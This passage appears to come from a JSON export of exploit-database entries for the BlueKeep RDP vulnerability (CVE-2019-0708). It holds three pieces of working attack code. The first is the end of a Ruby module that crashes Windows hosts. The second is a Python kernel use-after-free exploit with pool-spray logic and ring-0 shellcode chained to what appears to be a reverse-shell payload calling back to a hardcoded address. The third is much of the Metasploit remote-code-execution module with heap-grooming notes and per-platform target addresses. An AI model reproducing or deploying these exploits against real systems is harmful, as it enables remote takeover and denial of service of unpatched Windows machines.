hmackey))\r\n\r\n vprint_status(\"Sending client control cooperate PDU\")\r\n rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))\r\n\r\n vprint_status(\"Sending client control request control PDU\")\r\n rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))\r\n\r\n vprint_status(\"Sending client input sychronize PDU\")\r\n rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))\r\n\r\n vprint_status(\"Sending client font list PDU\")\r\n rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))\r\n\r\n vprint_status(\"Sending close mst120 PDU\")\r\n crash_test(rc4enckey, hmackey)\r\n\r\n vprint_status(\"Sending client disconnection PDU\")\r\n rdp_send(rdp_build_data_tpdu(\"\\x21\\x80\"))\r\n\r\n return(true)\r\n end\r\n\r\n # ------------------------------------------------------------------------- #\r\n\r\n def run_host(ip)\r\n ## Allow the run command to call the check command.\r\n begin\r\n if(open_connection())\r\n status = produce_dos()\r\n end\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\r\n bt = e.backtrace.join(\"\\n\")\r\n vprint_error(\"Unexpected error: #{e.message}\")\r\n vprint_line(bt)\r\n elog(\"#{e.message}\\n#{bt}\")\r\n rescue RdpCommunicationError => e\r\n vprint_error(\"Error communicating RDP protocol.\")\r\n status = Exploit::CheckCode::Unknown\r\n rescue Errno::ECONNRESET => e # NLA?\r\n vprint_error(\"Connection reset, possible NLA is enabled.\")\r\n rescue => e\r\n bt = e.backtrace.join(\"\\n\")\r\n vprint_error(\"Unexpected error: #{e.message}\")\r\n vprint_line(bt)\r\n elog(\"#{e.message}\\n#{bt}\")\r\n ensure\r\n\r\n if(status == true)\r\n sleep(1)\r\n unless(open_connection())\r\n print_good(\"The host is crashed!\")\r\n else\r\n print_bad(\"The DoS has been sent but the host is already connected!\")\r\n end\r\n end\r\n\r\n disconnect()\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/32978"}, {"lastseen": "2019-12-04T14:22:09", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2019-11-19T00:00:00", "title": "Microsoft Windows 7 (x86) - (BlueKeep) RDP Remote Windows Kernel Use After Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-11-19T00:00:00", "id": "1337DAY-ID-33565", "href": "https://0day.today/exploit/description/33565", "sourceData": "# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip\r\n\r\nimport rdp\r\nimport socket\r\nimport binascii\r\nimport time\r\n\r\ndef pool_spray(s, crypter, payload):\r\n\r\n times = 10000\r\n count = 0\r\n\r\n while count < times: \r\n\r\n count += 1 \r\n #print('time through %d' % count)\r\n\r\n try: \r\n\r\n s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload))\r\n\r\n except ConnectionResetError:\r\n\r\n print('ConnectionResetError pool_spray Aborting')\r\n\r\n quit()\r\n\r\ndef main():\r\n\r\n # change to your target\r\n host = '192.168.0.46'\r\n port = 3389\r\n\r\n times = 4000\r\n count = 0\r\n\r\n target = (host, port)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect(target)\r\n\r\n crypter = rdp.connect(s)\r\n\r\n # this address was choosen for the pool spray. it could be be\r\n # modified for potentially higher success rates.\r\n # in my testing against the win7 VM it is around 80% success\r\n # 0x874ff028\r\n shellcode_address = b'\\x28\\xf0\\x4f\\x87'\r\n\r\n # replace buf with your shellcode\r\n buf = b\"\"\r\n buf += b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\n buf += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\n buf += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\n buf += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\n buf += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\n buf += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\n buf += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\n buf += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\n buf += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\n buf += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\n buf += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\n buf += b\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\n buf += b\"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\n buf += b\"\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\"\r\n buf += b\"\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\\xc0\\xa8\\x00\\x22\\x68\"\r\n buf += b\"\\x02\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\n buf += b\"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\"\r\n buf += b\"\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\"\r\n buf += b\"\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\"\r\n buf += b\"\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\"\r\n buf += b\"\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\"\r\n buf += b\"\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\"\r\n buf += b\"\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\"\r\n buf += b\"\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n buf += b\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\"\r\n\r\n\r\n # bluekeep_kshellcode_x86.asm\r\n # ring 0 to ring 3 shellcode\r\n shellcode = b\"\"\r\n shellcode += b\"\\x60\\xe8\\x00\\x00\\x00\\x00\\x5b\\xe8\\x26\\x00\\x00\\x00\"\r\n shellcode += b\"\\xb9\\x76\\x01\\x00\\x00\\x0f\\x32\\x8d\\x7b\\x3c\\x39\\xf8\"\r\n shellcode += b\"\\x74\\x11\\x39\\x45\\x00\\x74\\x06\\x89\\x45\\x00\\x89\\x55\"\r\n shellcode += b\"\\x08\\x89\\xf8\\x31\\xd2\\x0f\\x30\\x61\\xf4\\xeb\\xfd\\xc2\"\r\n shellcode += b\"\\x24\\x00\\x8d\\xab\\x00\\x10\\x00\\x00\\xc1\\xed\\x0c\\xc1\"\r\n shellcode += b\"\\xe5\\x0c\\x83\\xed\\x50\\xc3\\xb9\\x23\\x00\\x00\\x00\\x6a\"\r\n shellcode += b\"\\x30\\x0f\\xa1\\x8e\\xd9\\x8e\\xc1\\x64\\x8b\\x0d\\x40\\x00\"\r\n shellcode += b\"\\x00\\x00\\x8b\\x61\\x04\\x51\\x9c\\x60\\xe8\\x00\\x00\\x00\"\r\n shellcode += b\"\\x00\\x5b\\xe8\\xcb\\xff\\xff\\xff\\x8b\\x45\\x00\\x83\\xc0\"\r\n shellcode += b\"\\x17\\x89\\x44\\x24\\x24\\x31\\xc0\\x99\\x42\\xf0\\x0f\\xb0\"\r\n shellcode += b\"\\x55\\x08\\x75\\x12\\xb9\\x76\\x01\\x00\\x00\\x99\\x8b\\x45\"\r\n shellcode += b\"\\x00\\x0f\\x30\\xfb\\xe8\\x04\\x00\\x00\\x00\\xfa\\x61\\x9d\"\r\n shellcode += b\"\\xc3\\x8b\\x45\\x00\\xc1\\xe8\\x0c\\xc1\\xe0\\x0c\\x2d\\x00\"\r\n shellcode += b\"\\x10\\x00\\x00\\x66\\x81\\x38\\x4d\\x5a\\x75\\xf4\\x89\\x45\"\r\n shellcode += b\"\\x04\\xb8\\x78\\x7c\\xf4\\xdb\\xe8\\xd3\\x00\\x00\\x00\\x97\"\r\n shellcode += b\"\\xb8\\x3f\\x5f\\x64\\x77\\x57\\xe8\\xc7\\x00\\x00\\x00\\x29\"\r\n shellcode += b\"\\xf8\\x89\\xc1\\x3d\\x70\\x01\\x00\\x00\\x75\\x03\\x83\\xc0\"\r\n shellcode += b\"\\x08\\x8d\\x58\\x1c\\x8d\\x34\\x1f\\x64\\xa1\\x24\\x01\\x00\"\r\n shellcode += b\"\\x00\\x8b\\x36\\x89\\xf2\\x29\\xc2\\x81\\xfa\\x00\\x04\\x00\"\r\n shellcode += b\"\\x00\\x77\\xf2\\x52\\xb8\\xe1\\x14\\x01\\x17\\xe8\\x9b\\x00\"\r\n shellcode += b\"\\x00\\x00\\x8b\\x40\\x0a\\x8d\\x50\\x04\\x8d\\x34\\x0f\\xe8\"\r\n shellcode += b\"\\xcb\\x00\\x00\\x00\\x3d\\x5a\\x6a\\xfa\\xc1\\x74\\x0e\\x3d\"\r\n shellcode += b\"\\xd8\\x83\\xe0\\x3e\\x74\\x07\\x8b\\x3c\\x17\\x29\\xd7\\xeb\"\r\n shellcode += b\"\\xe3\\x89\\x7d\\x0c\\x8d\\x1c\\x1f\\x8d\\x75\\x10\\x5f\\x8b\"\r\n shellcode += b\"\\x5b\\x04\\xb8\\x3e\\x4c\\xf8\\xce\\xe8\\x61\\x00\\x00\\x00\"\r\n shellcode += b\"\\x8b\\x40\\x0a\\x3c\\xa0\\x77\\x02\\x2c\\x08\\x29\\xf8\\x83\"\r\n shellcode += b\"\\x7c\\x03\\xfc\\x00\\x74\\xe1\\x31\\xc0\\x55\\x6a\\x01\\x55\"\r\n shellcode += b\"\\x50\\xe8\\x00\\x00\\x00\\x00\\x81\\x04\\x24\\x92\\x00\\x00\"\r\n shellcode += b\"\\x00\\x50\\x53\\x29\\x3c\\x24\\x56\\xb8\\xc4\\x5c\\x19\\x6d\"\r\n shellcode += b\"\\xe8\\x25\\x00\\x00\\x00\\x31\\xc0\\x50\\x50\\x50\\x56\\xb8\"\r\n shellcode += b\"\\x34\\x46\\xcc\\xaf\\xe8\\x15\\x00\\x00\\x00\\x85\\xc0\\x74\"\r\n shellcode += b\"\\xaa\\x8b\\x45\\x1c\\x80\\x78\\x0e\\x01\\x74\\x07\\x89\\x00\"\r\n shellcode += b\"\\x89\\x40\\x04\\xeb\\x9a\\xc3\\xe8\\x02\\x00\\x00\\x00\\xff\"\r\n shellcode += b\"\\xe0\\x60\\x8b\\x6d\\x04\\x97\\x8b\\x45\\x3c\\x8b\\x54\\x05\"\r\n shellcode += b\"\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\x49\"\r\n shellcode += b\"\\x8b\\x34\\x8b\\x01\\xee\\xe8\\x1d\\x00\\x00\\x00\\x39\\xf8\"\r\n shellcode += b\"\\x75\\xf1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\"\r\n shellcode += b\"\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\"\r\n shellcode += b\"\\x1c\\x61\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\"\r\n shellcode += b\"\\xc2\\x85\\xc0\\x75\\xf6\\x92\\x5a\\xc3\\x58\\x89\\x44\\x24\"\r\n shellcode += b\"\\x10\\x58\\x59\\x58\\x5a\\x60\\x52\\x51\\x8b\\x28\\x31\\xc0\"\r\n shellcode += b\"\\x64\\xa2\\x24\\x00\\x00\\x00\\x99\\xb0\\x40\\x50\\xc1\\xe0\"\r\n shellcode += b\"\\x06\\x50\\x54\\x52\\x89\\x11\\x51\\x4a\\x52\\xb8\\xea\\x99\"\r\n shellcode += b\"\\x6e\\x57\\xe8\\x7b\\xff\\xff\\xff\\x85\\xc0\\x75\\x4f\\x58\"\r\n shellcode += b\"\\x8b\\x38\\xe8\\x00\\x00\\x00\\x00\\x5e\\x83\\xc6\\x55\\xb9\"\r\n shellcode += b\"\\x00\\x04\\x00\\x00\\xf3\\xa4\\x8b\\x45\\x0c\\x50\\xb8\\x48\"\r\n shellcode += b\"\\xb8\\x18\\xb8\\xe8\\x56\\xff\\xff\\xff\\x8b\\x40\\x0c\\x8b\"\r\n shellcode += b\"\\x40\\x14\\x8b\\x00\\x66\\x83\\x78\\x24\\x18\\x75\\xf7\\x8b\"\r\n shellcode += b\"\\x50\\x28\\x81\\x7a\\x0c\\x33\\x00\\x32\\x00\\x75\\xeb\\x8b\"\r\n shellcode += b\"\\x58\\x10\\x89\\x5d\\x04\\xb8\\x5e\\x51\\x5e\\x83\\xe8\\x32\"\r\n shellcode += b\"\\xff\\xff\\xff\\x59\\x89\\x01\\x31\\xc0\\x88\\x45\\x08\\x40\"\r\n shellcode += b\"\\x64\\xa2\\x24\\x00\\x00\\x00\\x61\\xc3\\x5a\\x58\\x58\\x59\"\r\n shellcode += b\"\\x51\\x51\\x51\\xe8\\x00\\x00\\x00\\x00\\x83\\x04\\x24\\x09\"\r\n shellcode += b\"\\x51\\x51\\x52\\xff\\xe0\\x31\\xc0\"\r\n\r\n shellcode += buf\r\n\r\n print('shellcode len: %d' % len(shellcode))\r\n\r\n payload_size = 1600\r\n payload = b'\\x2c\\xf0\\x4f\\x87' + shellcode\r\n payload = payload + b'\\x5a' * (payload_size - len(payload))\r\n\r\n\r\n print('[+] spraying pool')\r\n pool_spray(s, crypter, payload)\r\n\r\n fake_obj_size = 168\r\n call_offset = 108\r\n fake_obj = b'\\x00'*call_offset + shellcode_address\r\n fake_obj = fake_obj + b'\\x00' * (fake_obj_size - len(fake_obj)) \r\n\r\n time.sleep(.5)\r\n print('[+] sending free')\r\n s.sendall(rdp.free_32(crypter))\r\n time.sleep(.15)\r\n\r\n print('[+] allocating fake objects')\r\n while count < times:\r\n \r\n count += 1 \r\n #print('time through %d' % count)\r\n\r\n try: \r\n\r\n s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj))\r\n\r\n except ConnectionResetError:\r\n\r\n s.close()\r\n\r\n s.close()\r\n\r\n\r\nif __name__== \"__main__\":\r\n main()\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33565"}, {"lastseen": "2019-12-04T03:55:30", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2019-09-24T00:00:00", "title": "Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-09-24T00:00:00", "id": "1337DAY-ID-33275", "href": "https://0day.today/exploit/description/33275", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# Exploitation and Caveats from zerosum0x0:\r\n#\r\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\r\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\r\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\r\n# 4. RDP has chunked messages, so we use this to groom.\r\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\r\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\r\n# i. RDPSND only works when\r\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\r\n# ii. This registry key is not a default setting for server 2008 R2.\r\n# We should use alternate groom channels or at least detect the\r\n# channel in advance.\r\n# 5. Use chunked grooming to fit new data in the freed channel, account for\r\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\r\n# the \"call [rax]\" gadget will get its pointer from.\r\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\r\n# i. Hot-swap memory is another problem because, with certain VMWare and\r\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\r\n# start. This can be anywhere from 100 mb to gigabytes of offset\r\n# before the NPP start.\r\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\r\n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\r\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\r\n# indirect call\r\n# d. We are limited to 0x400 payloads by channel chunk max size. My\r\n# current shellcode is a twin shellcode with eggfinders. I spam the\r\n# kernel payload and user payload, and if user payload is called first it\r\n# will egghunt for the kernel payload.\r\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\r\n# trigger the free by closing the socket.\r\n#\r\n# TODO:\r\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\r\n# * Write the XP/2003 portions grooming MS_T120.\r\n# * Detect if RDPSND grooming is working or not?\r\n# * Expand channels besides RDPSND/MS_T120 for grooming.\r\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\r\n#\r\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\r\n# MS_T120 on XP... should be same process as the RDPSND\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ManualRanking\r\n\r\n USERMODE_EGG = 0xb00dac0fefe31337\r\n KERNELMODE_EGG = 0xb00dac0fefe42069\r\n\r\n CHUNK_SIZE = 0x400\r\n HEADER_SIZE = 0x48\r\n\r\n include Msf::Exploit::Remote::RDP\r\n include Msf::Exploit::Remote::CheckScanner\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\r\n 'Description' => %q(\r\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\r\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\r\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\r\n the freed channel is used to achieve arbitrary code execution.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Sean Dillon <[email\u00a0protected]>', # @zerosum0x0 - Original exploit\r\n 'Ryan Hanson', # @ryHanson - Original exploit\r\n 'OJ Reeves <[email\u00a0protected]>', # @TheColonial - Metasploit module\r\n 'Brent Cook <[email\u00a0protected]>', # @busterbcook - Assembly whisperer\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2019-0708'],\r\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n 'WfsDelay' => 5,\r\n 'RDP_CLIENT_NAME' => 'ethdev',\r\n 'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'\r\n },\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Automatic targeting via fingerprinting',\r\n {\r\n 'Arch' => [ARCH_X64],\r\n 'FingerprintOnly' => true\r\n },\r\n ],\r\n #\r\n #\r\n # Windows 2008 R2 requires the following registry change from default:\r\n #\r\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\r\n # \"fDisableCam\"=dword:00000000\r\n #\r\n [\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8003800000,\r\n 'GROOMSIZE' => 100\r\n }\r\n ],\r\n [\r\n # This works with Virtualbox 6\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8002407000\r\n }\r\n ],\r\n [\r\n # This address works on VMWare 14\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8030c00000\r\n }\r\n ],\r\n [\r\n # This address works on VMWare 15\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8018C00000\r\n }\r\n ],\r\n [\r\n # This address works on VMWare 15.1\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8018c08000\r\n }\r\n ],\r\n [\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8102407000\r\n }\r\n ],\r\n [\r\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\r\n {\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X64],\r\n 'GROOMBASE' => 0xfffffa8018c08000\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 14 2019',\r\n 'Notes' =>\r\n {\r\n 'AKA' => ['Bluekeep']\r\n }\r\n ))\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\r\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\r\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\r\n ]\r\n )\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\r\n end\r\n\r\n if target['FingerprintOnly']\r\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')\r\n end\r\n\r\n begin\r\n rdp_connect\r\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\r\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\r\n end\r\n\r\n is_rdp, server_selected_proto = rdp_check_protocol\r\n unless is_rdp\r\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\r\n end\r\n\r\n # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us\r\n # from exploiting the target.\r\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\r\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\r\n end\r\n\r\n chans = [\r\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\r\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\r\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\r\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\r\n ]\r\n\r\n @mst120_chan_id = 1004 + chans.length - 1\r\n\r\n unless rdp_negotiate_security(chans, server_selected_proto)\r\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\r\n end\r\n\r\n rdp_establish_session\r\n\r\n rdp_dispatch_loop\r\n end\r\n\r\nprivate\r\n\r\n # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is\r\n # received on a channel, and this is when we need to kick off our exploit.\r\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\r\n # We have to do the default behaviour first.\r\n super(pkt, user, chan_id, flags, data)\r\n\r\n groom_size = datastore['GROOMSIZE']\r\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\r\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\r\n\r\n payloads = create_payloads(pool_addr)\r\n\r\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\r\n\r\n target_channel_id = chan_id + 1\r\n\r\n spray_buffer = create_exploit_channel_buffer(pool_addr)\r\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\r\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\r\n\r\n print_status(\"Surfing channels ...\")\r\n rdp_send(spray_channel * 1024)\r\n rdp_send(free_trigger)\r\n\r\n chan_surf_size = 0x421\r\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\r\n chan_surf_packet = spray_channel * spray_packets\r\n chan_surf_count = chan_surf_size / spray_packets\r\n\r\n chan_surf_count.times do\r\n rdp_send(chan_surf_packet)\r\n end\r\n\r\n print_status(\"Lobbing eggs ...\")\r\n\r\n groom_mb = groom_size * 1024 / payloads.length\r\n\r\n groom_mb.times do\r\n tpkts = ''\r\n for c in 0..groom_chan_count\r\n payloads.each do |p|\r\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\r\n end\r\n end\r\n rdp_send(tpkts)\r\n end\r\n\r\n # Terminating and disconnecting forces the USE\r\n print_status(\"Forcing the USE of FREE'd object ...\")\r\n rdp_terminate\r\n rdp_disconnect\r\n end\r\n\r\n # Helper function to create the kernel mode payload and the usermode payload with\r\n # the egg hunter prefix.\r\n def create_payloads(pool_address)\r\n begin\r\n [kernel_mode_payload, user_mode_payload].map { |p|\r\n [\r\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\r\n p\r\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\r\n }\r\n rescue => ex\r\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\r\n end\r\n end\r\n\r\n def assemble_with_fixups(asm)\r\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\r\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\r\n # not grok that syntax.\r\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\r\n asm.gsub!(lea_rel) do |match|\r\n match = \"lea #{$1}, [rip + #{$2}]\"\r\n end\r\n\r\n # metasm encodes all rep 